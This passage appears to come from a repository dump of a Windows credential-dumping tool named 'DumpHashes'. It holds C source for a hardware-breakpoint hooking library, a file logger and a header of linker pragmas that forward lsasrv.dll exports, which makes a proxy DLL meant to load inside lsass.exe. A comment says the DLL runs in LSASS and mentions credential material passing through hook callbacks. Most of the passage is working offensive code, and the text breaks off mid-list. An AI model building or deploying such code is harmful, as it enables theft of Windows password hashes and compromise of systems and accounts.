149 | while (TempObject != NULL) 150 | { 151 | RemoveHardwareBreakingPntHook(TempObject->Address, TempObject->ThreadId); 152 | TempObject = TempObject->Next; 153 | } 154 | 155 | LeaveCriticalSection(&g_HookingCriticalSection); 156 | 157 | if (GlobalHardwareBreakpointObject.HandlerObject) 158 | RemoveVectoredExceptionHandler(GlobalHardwareBreakpointObject.HandlerObject); 159 | 160 | DeleteCriticalSection(&g_HookingCriticalSection); 161 | 162 | GlobalHardwareBreakpointObject.IsInit = FALSE; 163 | 164 | 
return TRUE; 165 | } 166 | 167 | 168 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 169 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 170 | 171 | LONG ExceptionHandlerCallbackRoutine(IN PEXCEPTION_POINTERS ExceptionInfo) 172 | { 173 | DESCRIPTOR_ENTRY* TempObject = { 0 }; 174 | BOOL bResolved = FALSE; 175 | 176 | if (ExceptionInfo->ExceptionRecord->ExceptionCode != STATUS_SINGLE_STEP) 177 | goto EXIT_ROUTINE; 178 | 179 | EnterCriticalSection(&g_HookingCriticalSection); 180 | 181 | TempObject = g_Head; 182 | 183 | while (TempObject != NULL){ 184 | 185 | if (TempObject->Address == ExceptionInfo->ContextRecord->Rip && !TempObject->Processed) { 186 | 187 | if (TempObject->ThreadId != 0 && TempObject->ThreadId != _GetCurrentThreadId()) 188 | { 189 | TempObject->Processed = TRUE; 190 | continue; 191 | } 192 | 193 | // 1. Disable hw breakpoint 194 | if (!SetHardwareBreakpoint(_GetCurrentThreadId(), TempObject->Address, TempObject->Drx, FALSE)) 195 | goto EXIT_ROUTINE; 196 | 197 | // 2. Execute the callback (detour function) 198 | VOID(*fnHookFunc)(PCONTEXT) = TempObject->CallbackFunction; 199 | fnHookFunc(ExceptionInfo->ContextRecord); 200 | 201 | // 3. Enable the hw breakpoint again 202 | if (!SetHardwareBreakpoint(_GetCurrentThreadId(), TempObject->Address, TempObject->Drx, TRUE)) 203 | goto EXIT_ROUTINE; 204 | 205 | TempObject->Processed = TRUE; 206 | } 207 | 208 | TempObject->Processed = FALSE; 209 | TempObject = TempObject->Next; 210 | } 211 | 212 | LeaveCriticalSection(&g_HookingCriticalSection); 213 | 214 | bResolved = TRUE; 215 | 216 | EXIT_ROUTINE: 217 | 218 | return (bResolved ? 
EXCEPTION_CONTINUE_EXECUTION : EXCEPTION_CONTINUE_SEARCH); 219 | } 220 | 221 | 222 | 223 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 224 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 225 | 226 | BOOL SetHardwareBreakpoint(IN DWORD ThreadId, IN PUINT_VAR_T Address, IN DRX Drx, IN BOOL bInitializeHWBP) 227 | { 228 | CONTEXT Context = { .ContextFlags = CONTEXT_DEBUG_REGISTERS }; 229 | HANDLE hThread = INVALID_HANDLE_VALUE; 230 | BOOL bSuspendedThread = FALSE; 231 | BOOL bReturn = FALSE; 232 | 233 | 234 | if (ThreadId != _GetCurrentThreadId()) 235 | { 236 | if ((hThread = OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT, FALSE, ThreadId)) == NULL) 237 | { 238 | DBGPRINTF(L"[!] OpenThread [%ld] Failed: %d\n", __LINE__, GetLastError()); 239 | goto EXIT_ROUTINE; 240 | } 241 | } 242 | else 243 | hThread = ((HANDLE)-2); 244 | 245 | 246 | if (hThread != ((HANDLE)-2)) 247 | { 248 | if (SuspendThread(hThread) == ((DWORD)-1)) 249 | { 250 | DBGPRINTF(L"[!] SuspendThread [%ld] Failed: %d\n", __LINE__, GetLastError()); 251 | goto EXIT_ROUTINE; 252 | } 253 | 254 | bSuspendedThread = TRUE; 255 | } 256 | 257 | if (!GetThreadContext(hThread, &Context)) 258 | { 259 | DBGPRINTF(L"[!] GetThreadContext [%ld] Failed: %d\n", __LINE__, GetLastError()); 260 | goto EXIT_ROUTINE; 261 | } 262 | 263 | if (bInitializeHWBP) 264 | { 265 | (&Context.Dr0)[Drx] = Address; 266 | Context.Dr7 = SetDr7Bits(Context.Dr7, (Drx * 2), 1, 1); 267 | } 268 | else 269 | { 270 | if ((&Context.Dr0)[Drx] == Address){ 271 | (&Context.Dr0)[Drx] = 0ull; 272 | Context.Dr7 = SetDr7Bits(Context.Dr7, (Drx * 2), 1, 0); 273 | } 274 | } 275 | 276 | if (!SetThreadContext(hThread, &Context)) 277 | { 278 | DBGPRINTF(L"[!] 
SetThreadContext [%ld] Failed: %d\n", __LINE__, GetLastError()); 279 | goto EXIT_ROUTINE; 280 | } 281 | 282 | bReturn = TRUE; 283 | 284 | EXIT_ROUTINE: 285 | if (bSuspendedThread) 286 | { 287 | if (ResumeThread(hThread) == ((DWORD)-1)) 288 | DBGPRINTF(L"[!] ResumeThread [%ld] Failed: %d\n", __LINE__, GetLastError()); 289 | } 290 | if (hThread && hThread != ((HANDLE)-2)) 291 | CloseHandle(hThread); 292 | return bReturn; 293 | } 294 | 295 | 296 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 297 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 298 | 299 | 300 | #define STATUS_SUCCESS 0x00000000 301 | #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 302 | 303 | typedef NTSTATUS(WINAPI* fnNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); 304 | 305 | 306 | BOOL SnapshotInsertHardwareBreakpointHookIntoTargetThread(IN PUINT_VAR_T Address, IN DRX Drx, IN BOOL bInitializeHWBP, IN DWORD ThreadId) 307 | { 308 | 309 | fnNtQuerySystemInformation pNtQuerySystemInformation = NULL; 310 | ULONG uReturnLen1 = NULL, 311 | uReturnLen2 = NULL; 312 | PSYSTEM_PROCESS_INFORMATION SystemProcInfo = NULL; 313 | DWORD64 dw64AllocatedSize = INITIAL_ALLOCATION_SIZE; 314 | PVOID pValueToFree = NULL; 315 | NTSTATUS STATUS = NULL; 316 | BOOL bResult = FALSE; 317 | 318 | pNtQuerySystemInformation = (fnNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"NTDLL.DLL"), "NtQuerySystemInformation"); 319 | if (pNtQuerySystemInformation == NULL) { 320 | DBGPRINTF(L"[!] 
GetProcAddress [%ld] Failed: %d\n", __LINE__, GetLastError()); 321 | goto _END_OF_FUNC; 322 | } 323 | 324 | 325 | do { 326 | 327 | if (SystemProcInfo) 328 | { 329 | HeapFree(GetProcessHeap(), 0x00, SystemProcInfo); 330 | SystemProcInfo = NULL; 331 | } 332 | 333 | if (!(SystemProcInfo = (PSYSTEM_PROCESS_INFORMATION)HeapAlloc(_GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)dw64AllocatedSize))) 334 | { 335 | DBGPRINTF(L"[!] HeapAlloc [%ld] Failed: %d\n", __LINE__, GetLastError()); 336 | goto _END_OF_FUNC; 337 | } 338 | 339 | if ((STATUS = pNtQuerySystemInformation(SystemProcessInformation, SystemProcInfo, dw64AllocatedSize, &uReturnLen1)) != STATUS_SUCCESS && STATUS != STATUS_INFO_LENGTH_MISMATCH) { 340 | DBGPRINTF(L"[!] NtQuerySystemInformation Failed (1): 0x%0.8X\n", STATUS); 341 | goto _END_OF_FUNC; 342 | } 343 | 344 | dw64AllocatedSize *= 2; 345 | 346 | } while (STATUS == STATUS_INFO_LENGTH_MISMATCH); 347 | 348 | 349 | pValueToFree = SystemProcInfo; 350 | 351 | while (TRUE) { 352 | 353 | 354 | if (SystemProcInfo->UniqueProcessId == _GetCurrentProcessId()) { 355 | 356 | PSYSTEM_THREAD_INFORMATION SystemThreadInfo = (PSYSTEM_THREAD_INFORMATION)SystemProcInfo->Threads; 357 | 358 | for (DWORD i = 0; i < SystemProcInfo->NumberOfThreads; i++) { 359 | 360 | if (ThreadId != ALL_THREADS && ThreadId != SystemThreadInfo[i].ClientId.UniqueThread) 361 | continue; 362 | 363 | if (!SetHardwareBreakpoint(SystemThreadInfo[i].ClientId.UniqueThread, Address, Drx, bInitializeHWBP)) 364 | { 365 | DBGPRINTF(L"[!] 
SetHardwareBreakpoint Failed On Thread: %ld\n", SystemThreadInfo[i].ClientId.UniqueThread); 366 | // Ignore the error and continue 367 | //\ 368 | goto _END_OF_FUNC; 369 | } 370 | } 371 | 372 | break; 373 | } 374 | 375 | if (!SystemProcInfo->NextEntryOffset) 376 | break; 377 | 378 | SystemProcInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONG_PTR)SystemProcInfo + SystemProcInfo->NextEntryOffset); 379 | } 380 | 381 | bResult = TRUE; 382 | 383 | _END_OF_FUNC: 384 | if (pValueToFree) 385 | HeapFree(_GetProcessHeap(), 0, pValueToFree); 386 | return bResult; 387 | } 388 | 389 | 390 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 391 | //------------------------------------------------------------------------------------------------------------------------------------------------------------------ 392 | 393 | 394 | BOOL InstallHardwareBreakingPntHook(IN PUINT_VAR_T Address, IN DRX Drx, IN PVOID CallbackRoutine, IN DWORD ThreadId) 395 | { 396 | DESCRIPTOR_ENTRY* NewEntry = NULL; 397 | 398 | if ((NewEntry = (DESCRIPTOR_ENTRY*)HeapAlloc(_GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(DESCRIPTOR_ENTRY))) == NULL) 399 | { 400 | DBGPRINTF(L"[!] 
HeapAlloc [%ld] Failed: %d\n", __LINE__, GetLastError()); 401 | return FALSE; 402 | } 403 | 404 | EnterCriticalSection(&g_HookingCriticalSection); 405 | 406 | NewEntry->Address = Address; 407 | NewEntry->Drx = Drx; 408 | NewEntry->ThreadId = ThreadId; 409 | NewEntry->CallbackFunction = CallbackRoutine; 410 | NewEntry->Next = g_Head; 411 | NewEntry->Previous = NULL; 412 | 413 | if (g_Head != NULL) 414 | g_Head->Previous = NewEntry; 415 | 416 | g_Head = NewEntry; 417 | 418 | LeaveCriticalSection(&g_HookingCriticalSection); 419 | 420 | return SnapshotInsertHardwareBreakpointHookIntoTargetThread(Address, Drx, TRUE, ThreadId); 421 | } 422 | 423 | 424 | BOOL RemoveHardwareBreakingPntHook(IN PUINT_VAR_T Address, IN DWORD ThreadId) 425 | { 426 | DESCRIPTOR_ENTRY* TempObject = NULL; 427 | enum DRX Drx = -1; 428 | BOOL bResult = FALSE, 429 | Found = FALSE; 430 | 431 | EnterCriticalSection(&g_HookingCriticalSection); 432 | 433 | TempObject = g_Head; 434 | 435 | while (TempObject != NULL) 436 | { 437 | if (TempObject->Address == Address && TempObject->ThreadId == ThreadId) 438 | { 439 | Found = TRUE; 440 | 441 | Drx = TempObject->Drx; 442 | 443 | if (g_Head == TempObject) 444 | g_Head = TempObject->Next; 445 | 446 | if (TempObject->Next != NULL) 447 | TempObject->Next->Previous = TempObject->Previous; 448 | 449 | if (TempObject->Previous != NULL) 450 | TempObject->Previous->Next = TempObject->Next; 451 | 452 | //if (TempObject) 453 | // HeapFree(_GetProcessHeap(), HEAP_ZERO_MEMORY, TempObject); 454 | } 455 | 456 | if (TempObject) 457 | TempObject = TempObject->Next; 458 | } 459 | 460 | LeaveCriticalSection(&g_HookingCriticalSection); 461 | 462 | if (Found) 463 | bResult = SnapshotInsertHardwareBreakpointHookIntoTargetThread(Address, Drx, FALSE, ThreadId); 464 | 465 | return bResult; 466 | } 467 | 468 | 469 | 470 | //------------------------------------------------------------------------------------------------------------------------------------------------------ 471 | 
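//------------------------------------------------------------------------------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/DumpHashes/HardwareBreakingLib.h:
--------------------------------------------------------------------------------
#include <windows.h>
#include <stdint.h>

#ifndef HARDWARE_BP
#define HARDWARE_BP


//---------------------------------------------------------------------------------------------------------------------------------------------------------
//---------------------------------------------------------------------------------------------------------------------------------------------------------
// PRIVATE

#define INITIAL_ALLOCATION_SIZE 0x1000 // 4KB
#define ALL_THREADS 0x00               // ThreadId value meaning "every thread of this process"


// Breakpoint address type. Despite the "P" prefix this is an INTEGER (uintptr_t), not a pointer.
typedef uintptr_t PUINT_VAR_T;

typedef struct __HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL {
    PVOID HandlerObject;   // presumably the handle returned when the VEH handler is registered — confirm in the .c
    BOOL IsInit;
} HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL, * PHARDWARE_ENGINE_INIT_SETTINGS_GLOBAL;

// Which debug address register (DR0..DR3) a breakpoint occupies.
typedef enum _DRX
{
    Dr0,
    Dr1,
    Dr2,
    Dr3

} DRX, * PDRX;


// One registered hook, kept in a doubly-linked list.
typedef struct DESCRIPTOR_ENTRY {
    PUINT_VAR_T Address;                    // breakpoint address
    DRX Drx;                                // was `enum DRX` — an undeclared tag that only MSVC tolerates; DRX is the real type
    DWORD ThreadId;                         // target thread id, or ALL_THREADS
    VOID (*CallbackFunction)(PCONTEXT);     // detour, called with the interrupted thread's CONTEXT
    BOOL Processed;                         // NOTE(review): set by the exception handler (not visible here) — confirm
    struct DESCRIPTOR_ENTRY* Next;
    struct DESCRIPTOR_ENTRY* Previous;
} DESCRIPTOR_ENTRY, * PDESCRIPTOR_ENTRY;

// Read / write the Nth argument of the hooked call from a thread CONTEXT (1-based index).
PBYTE GetFunctionArgument(IN PCONTEXT pThreadCtx, IN DWORD dwParmIndex);
VOID SetFunctionArgument(IN PCONTEXT pThreadCtx, IN ULONG_PTR uValue, IN DWORD dwParmIndex);

//---------------------------------------------------------------------------------------------------------------------------------------------------------
//---------------------------------------------------------------------------------------------------------------------------------------------------------

// Resume the execution of the original function
// This should always be called from the detour function
// Sets the Resume Flag (EFLAGS bit 16) so the instruction at the breakpoint address
// runs once without re-raising the debug exception.
#define CONTINUE_EXECUTION(CTX) ((CTX)->EFlags = (CTX)->EFlags | (1 << 16))

// Set a return value
// (The original cast the left-hand side — `(ULONG_PTR)CTX->Rax = ...` — which is not an
// lvalue in ISO C and only compiles as a Microsoft extension. Rax is already 64-bit wide.)
#define RETURN_VALUE(CTX, VALUE) ((CTX)->Rax = (ULONG_PTR)(VALUE))

// Block the execution of the original function
VOID BLOCK_REAL(IN PCONTEXT pThreadCtx);

// Get Parameters
#define GETPARM_1(CTX) (GetFunctionArgument((CTX), 0x1))
#define GETPARM_2(CTX) (GetFunctionArgument((CTX), 0x2))
#define GETPARM_3(CTX) (GetFunctionArgument((CTX), 0x3))
#define GETPARM_4(CTX) (GetFunctionArgument((CTX), 0x4))
#define GETPARM_5(CTX) (GetFunctionArgument((CTX), 0x5))
#define GETPARM_6(CTX) (GetFunctionArgument((CTX), 0x6))
#define GETPARM_7(CTX) (GetFunctionArgument((CTX), 0x7))
#define GETPARM_8(CTX) (GetFunctionArgument((CTX), 0x8))
#define GETPARM_9(CTX) (GetFunctionArgument((CTX), 0x9))
#define GETPARM_A(CTX) (GetFunctionArgument((CTX), 0xA))
#define GETPARM_B(CTX) (GetFunctionArgument((CTX), 0xB))

// Set Parameters
#define SETPARM_1(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x1))
#define SETPARM_2(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x2))
#define SETPARM_3(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x3))
#define SETPARM_4(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x4))
#define SETPARM_5(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x5))
#define SETPARM_6(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x6))
#define SETPARM_7(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x7))
#define SETPARM_8(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x8))
#define SETPARM_9(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0x9))
#define SETPARM_A(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0xA))
#define SETPARM_B(CTX, VALUE) (SetFunctionArgument((CTX), (VALUE), 0xB))


//---------------------------------------------------------------------------------------------------------------------------------------------------------
//---------------------------------------------------------------------------------------------------------------------------------------------------------


// Initialize hardware breaking point library (populate global variables & set up the veh handler)
BOOL InitHardwareBreakpointHooking(VOID);
// Disable all the breaking points set and delete the veh handler
BOOL CleapUpHardwareBreakpointHooking(VOID);


/*
 * Install hook on a specified address
 *  Address         = Hardware breakpoint address (where to install)
 *  Drx             = Can be Dr0 -> Dr3
 *  CallbackRoutine = Pointer to the detour function
 *  ThreadId        = Thread identifier to hook | 'ALL_THREADS' to hook all threads
 *  Returns TRUE on success.
 */
BOOL InstallHardwareBreakingPntHook(IN PUINT_VAR_T Address, IN DRX Drx, IN PVOID CallbackRoutine, IN DWORD ThreadId);



/*
 * Remove hook on a specified address
 *  Address  = Hardware breakpoint address (where to unhook)
 *  ThreadId = Thread identifier to unhook | 'ALL_THREADS' to remove hook from all threads
 *  Returns TRUE if a matching hook existed and was disarmed.
 */
BOOL RemoveHardwareBreakingPntHook(IN PUINT_VAR_T Address, IN DWORD ThreadId);


//---------------------------------------------------------------------------------------------------------------------------------------------------------
//---------------------------------------------------------------------------------------------------------------------------------------------------------
#endif // !HARDWARE_BP


--------------------------------------------------------------------------------
/DumpHashes/Log.c:
--------------------------------------------------------------------------------
#include 
#include 

#include "Log.h"


/*
@ Writes the debug log to a file. 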
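*/

/*
 * Formats `szFmt` + varargs into a fixed 255-wchar buffer and appends it to
 * DEBUG_FILE; falls back to OutputDebugStringW if the file cannot be opened.
 * Write errors are ignored (best-effort logging).
 *
 * Why _vsnwprintf_s/_TRUNCATE instead of vswprintf_s: on a message longer than
 * the buffer, vswprintf_s invokes the CRT invalid-parameter handler, which in a
 * release build terminates the process. This DLL runs inside lsass.exe, so one
 * oversized log line would take LSASS down (and the machine with it). Truncation
 * is the safe failure mode here.
 *
 * NOTE(review): the file is created with a NULL security descriptor, so it
 * inherits the DACL of C:\ — on a default install that is readable by local
 * Users. If the hook callbacks ever route credential material through
 * DBGPRINTF, any local user can read it; confirm what callers log.
 */
VOID LogToFileW(IN LPCWSTR szFmt, ...) {

    WCHAR szInputBuffer[0xFF] = { 0 };
    va_list Args;                          // was `PSTR pArgs` — only works because x64 MSVC's va_list is a char*
    HANDLE hFile = INVALID_HANDLE_VALUE;
    DWORD dwWrittenBytes = 0x00;

    va_start(Args, szFmt);
    // Returns -1 on truncation but always NUL-terminates; wcslen below stays valid.
    _vsnwprintf_s(szInputBuffer, _countof(szInputBuffer), _TRUNCATE, szFmt, Args);
    va_end(Args);

    if ((hFile = CreateFileW(DEBUG_FILE, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE)
    {
        WriteFile(hFile, szInputBuffer, (DWORD)(wcslen(szInputBuffer) * sizeof(WCHAR)), &dwWrittenBytes, NULL);
        CloseHandle(hFile);
    }
    else
    {
        OutputDebugStringW(szInputBuffer);
    }

}
--------------------------------------------------------------------------------
/DumpHashes/Log.h:
--------------------------------------------------------------------------------
#pragma once


#define DEBUG_FILE L"C:\\DummyDebug.log"
#define DBGPRINTF(fmt, ...) LogToFileW((fmt), __VA_ARGS__)

--------------------------------------------------------------------------------
/DumpHashes/LsasrvExports.h:
--------------------------------------------------------------------------------
#pragma once




/*
@ lsasrv.dll's exports
*/

#pragma comment(linker, "/export:InitializeLsaExtension=lsasrv.dll.InitializeLsaExtension,@40")
#pragma comment(linker, "/export:IsTraceLevelEnabled=lsasrv.dll.IsTraceLevelEnabled,@41")
#pragma comment(linker, "/export:LsaDbLookupSidChainRequest=lsasrv.dll.LsaDbLookupSidChainRequest,@53")
#pragma comment(linker, "/export:LsaIAddNamesToLogonSession=lsasrv.dll.LsaIAddNamesToLogonSession,@54")
#pragma comment(linker, "/export:LsaIAdjustTokenObjectIntegrity=lsasrv.dll.LsaIAdjustTokenObjectIntegrity,@55")
#pragma comment(linker, "/export:LsaIAdtAuditingEnabledByCategory=lsasrv.dll.LsaIAdtAuditingEnabledByCategory,@56")
#pragma comment(linker, 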
"/export:LsaIAdtAuditingEnabledBySubCategory=lsasrv.dll.LsaIAdtAuditingEnabledBySubCategory,@57") 17 | #pragma comment(linker, "/export:LsaIAllocateHeap=lsasrv.dll.LsaIAllocateHeap,@58") 18 | #pragma comment(linker, "/export:LsaIAllocateHeapZero=lsasrv.dll.LsaIAllocateHeapZero,@59") 19 | #pragma comment(linker, "/export:LsaIAllowProtectedCredLogon=lsasrv.dll.LsaIAllowProtectedCredLogon,@60") 20 | #pragma comment(linker, "/export:LsaIAuditAccountLogon=lsasrv.dll.LsaIAuditAccountLogon,@61") 21 | #pragma comment(linker, "/export:LsaIAuditAccountLogonEx=lsasrv.dll.LsaIAuditAccountLogonEx,@62") 22 | #pragma comment(linker, "/export:LsaIAuditInitializeParametersAndWriteEvent=lsasrv.dll.LsaIAuditInitializeParametersAndWriteEvent,@63") 23 | #pragma comment(linker, "/export:LsaIAuditKdcEvent=lsasrv.dll.LsaIAuditKdcEvent,@64") 24 | #pragma comment(linker, "/export:LsaIAuditKerberosLogon=lsasrv.dll.LsaIAuditKerberosLogon,@65") 25 | #pragma comment(linker, "/export:LsaIAuditLogonEx=lsasrv.dll.LsaIAuditLogonEx,@66") 26 | #pragma comment(linker, "/export:LsaIAuditLogonUsingExplicitCreds=lsasrv.dll.LsaIAuditLogonUsingExplicitCreds,@67") 27 | #pragma comment(linker, "/export:LsaIAuditNotifyPackageLoad=lsasrv.dll.LsaIAuditNotifyPackageLoad,@68") 28 | #pragma comment(linker, "/export:LsaIAuditPasswordAccessEvent=lsasrv.dll.LsaIAuditPasswordAccessEvent,@69") 29 | #pragma comment(linker, "/export:LsaIAuditReplay=lsasrv.dll.LsaIAuditReplay,@70") 30 | #pragma comment(linker, "/export:LsaIAuditSamEvent=lsasrv.dll.LsaIAuditSamEvent,@71") 31 | #pragma comment(linker, "/export:LsaICallPackage=lsasrv.dll.LsaICallPackage,@72") 32 | #pragma comment(linker, "/export:LsaICallPackageEx=lsasrv.dll.LsaICallPackageEx,@73") 33 | #pragma comment(linker, "/export:LsaICallPackagePassthrough=lsasrv.dll.LsaICallPackagePassthrough,@74") 34 | #pragma comment(linker, "/export:LsaICancelNotification=lsasrv.dll.LsaICancelNotification,@75") 35 | #pragma comment(linker, 
"/export:LsaIChangeSecretCipherKey=lsasrv.dll.LsaIChangeSecretCipherKey,@76") 36 | #pragma comment(linker, "/export:LsaICheckProtectedUserByTokenInfo=lsasrv.dll.LsaICheckProtectedUserByTokenInfo,@77") 37 | #pragma comment(linker, "/export:LsaICheckRestrictedMode=lsasrv.dll.LsaICheckRestrictedMode,@78") 38 | #pragma comment(linker, "/export:LsaIClearOldSyskey=lsasrv.dll.LsaIClearOldSyskey,@79") 39 | #pragma comment(linker, "/export:LsaIContextToHandleNoRef=lsasrv.dll.LsaIContextToHandleNoRef,@80") 40 | #pragma comment(linker, "/export:LsaICopyToTokenInfoFromHandle=lsasrv.dll.LsaICopyToTokenInfoFromHandle,@81") 41 | #pragma comment(linker, "/export:LsaICryptProtectData=lsasrv.dll.LsaICryptProtectData,@82") 42 | #pragma comment(linker, "/export:LsaICryptProtectDataEx=lsasrv.dll.LsaICryptProtectDataEx,@83") 43 | #pragma comment(linker, "/export:LsaICryptUnprotectData=lsasrv.dll.LsaICryptUnprotectData,@84") 44 | #pragma comment(linker, "/export:LsaICryptUnprotectDataEx=lsasrv.dll.LsaICryptUnprotectDataEx,@85") 45 | #pragma comment(linker, "/export:LsaIDereferenceCredHandle=lsasrv.dll.LsaIDereferenceCredHandle,@86") 46 | #pragma comment(linker, "/export:LsaIDereferenceCtxtHandle=lsasrv.dll.LsaIDereferenceCtxtHandle,@87") 47 | #pragma comment(linker, "/export:LsaIDeriveCredentialKey=lsasrv.dll.LsaIDeriveCredentialKey,@88") 48 | #pragma comment(linker, "/export:LsaIDsNotifiedObjectChange=lsasrv.dll.LsaIDsNotifiedObjectChange,@89") 49 | #pragma comment(linker, "/export:LsaIEfsAcceptSmartcardCredentials=lsasrv.dll.LsaIEfsAcceptSmartcardCredentials,@90") 50 | #pragma comment(linker, "/export:LsaIEqualLogonProcessName=lsasrv.dll.LsaIEqualLogonProcessName,@91") 51 | #pragma comment(linker, "/export:LsaIEqualSupplementalTokenInfo=lsasrv.dll.LsaIEqualSupplementalTokenInfo,@92") 52 | #pragma comment(linker, "/export:LsaIEventWritePackageNoCredential=lsasrv.dll.LsaIEventWritePackageNoCredential,@93") 53 | #pragma comment(linker, 
"/export:LsaIEventWritePackageNotCacheLogonUser=lsasrv.dll.LsaIEventWritePackageNotCacheLogonUser,@94") 54 | #pragma comment(linker, "/export:LsaIExtractTargetInfo=lsasrv.dll.LsaIExtractTargetInfo,@95") 55 | #pragma comment(linker, "/export:LsaIFilterInboundNamespace=lsasrv.dll.LsaIFilterInboundNamespace,@96") 56 | #pragma comment(linker, "/export:LsaIFilterNamespace=lsasrv.dll.LsaIFilterNamespace,@97") 57 | #pragma comment(linker, "/export:LsaIFilterSids=lsasrv.dll.LsaIFilterSids,@98") 58 | #pragma comment(linker, "/export:LsaIFlushIdentityCacheForSid=lsasrv.dll.LsaIFlushIdentityCacheForSid,@99") 59 | #pragma comment(linker, "/export:LsaIForestTrustFindMatch=lsasrv.dll.LsaIForestTrustFindMatch,@100") 60 | #pragma comment(linker, "/export:LsaIFreeFilterInboundNamespaceResult=lsasrv.dll.LsaIFreeFilterInboundNamespaceResult,@101") 61 | #pragma comment(linker, "/export:LsaIFreeForestTrustInfo=lsasrv.dll.LsaIFreeForestTrustInfo,@102") 62 | #pragma comment(linker, "/export:LsaIFreeHeap=lsasrv.dll.LsaIFreeHeap,@103") 63 | #pragma comment(linker, "/export:LsaIFreeReturnBuffer=lsasrv.dll.LsaIFreeReturnBuffer,@104") 64 | #pragma comment(linker, "/export:LsaIFreeSupplementalTokenInfo=lsasrv.dll.LsaIFreeSupplementalTokenInfo,@105") 65 | #pragma comment(linker, "/export:LsaIFree_LSAI_PRIVATE_DATA=lsasrv.dll.LsaIFree_LSAI_PRIVATE_DATA,@106") 66 | #pragma comment(linker, "/export:LsaIFree_LSAI_SECRET_ENUM_BUFFER=lsasrv.dll.LsaIFree_LSAI_SECRET_ENUM_BUFFER,@107") 67 | #pragma comment(linker, "/export:LsaIFree_LSAPR_ACCOUNT_ENUM_BUFFER=lsasrv.dll.LsaIFree_LSAPR_ACCOUNT_ENUM_BUFFER,@108") 68 | #pragma comment(linker, "/export:LsaIFree_LSAPR_CR_CIPHER_VALUE=lsasrv.dll.LsaIFree_LSAPR_CR_CIPHER_VALUE,@109") 69 | #pragma comment(linker, "/export:LsaIFree_LSAPR_POLICY_DOMAIN_INFORMATION=lsasrv.dll.LsaIFree_LSAPR_POLICY_DOMAIN_INFORMATION,@110") 70 | #pragma comment(linker, "/export:LsaIFree_LSAPR_POLICY_INFORMATION=lsasrv.dll.LsaIFree_LSAPR_POLICY_INFORMATION,@111") 71 | #pragma 
comment(linker, "/export:LsaIFree_LSAPR_PRIVILEGE_ENUM_BUFFER=lsasrv.dll.LsaIFree_LSAPR_PRIVILEGE_ENUM_BUFFER,@112") 72 | #pragma comment(linker, "/export:LsaIFree_LSAPR_PRIVILEGE_SET=lsasrv.dll.LsaIFree_LSAPR_PRIVILEGE_SET,@113") 73 | #pragma comment(linker, "/export:LsaIFree_LSAPR_REFERENCED_DOMAIN_LIST=lsasrv.dll.LsaIFree_LSAPR_REFERENCED_DOMAIN_LIST,@114") 74 | #pragma comment(linker, "/export:LsaIFree_LSAPR_SR_SECURITY_DESCRIPTOR=lsasrv.dll.LsaIFree_LSAPR_SR_SECURITY_DESCRIPTOR,@115") 75 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRANSLATED_NAMES=lsasrv.dll.LsaIFree_LSAPR_TRANSLATED_NAMES,@116") 76 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRANSLATED_SIDS=lsasrv.dll.LsaIFree_LSAPR_TRANSLATED_SIDS,@117") 77 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRUSTED_DOMAIN_INFO=lsasrv.dll.LsaIFree_LSAPR_TRUSTED_DOMAIN_INFO,@118") 78 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER=lsasrv.dll.LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER,@119") 79 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER_EX=lsasrv.dll.LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER_EX,@120") 80 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRUST_INFORMATION=lsasrv.dll.LsaIFree_LSAPR_TRUST_INFORMATION,@121") 81 | #pragma comment(linker, "/export:LsaIFree_LSAPR_UNICODE_STRING=lsasrv.dll.LsaIFree_LSAPR_UNICODE_STRING,@122") 82 | #pragma comment(linker, "/export:LsaIFree_LSAPR_UNICODE_STRING_BUFFER=lsasrv.dll.LsaIFree_LSAPR_UNICODE_STRING_BUFFER,@123") 83 | #pragma comment(linker, "/export:LsaIFree_LSAP_SITENAME_INFO=lsasrv.dll.LsaIFree_LSAP_SITENAME_INFO,@124") 84 | #pragma comment(linker, "/export:LsaIFree_LSAP_SITE_INFO=lsasrv.dll.LsaIFree_LSAP_SITE_INFO,@125") 85 | #pragma comment(linker, "/export:LsaIFree_LSAP_SUBNET_INFO=lsasrv.dll.LsaIFree_LSAP_SUBNET_INFO,@126") 86 | #pragma comment(linker, "/export:LsaIFree_LSAP_UPN_SUFFIXES=lsasrv.dll.LsaIFree_LSAP_UPN_SUFFIXES,@127") 87 | #pragma comment(linker, 
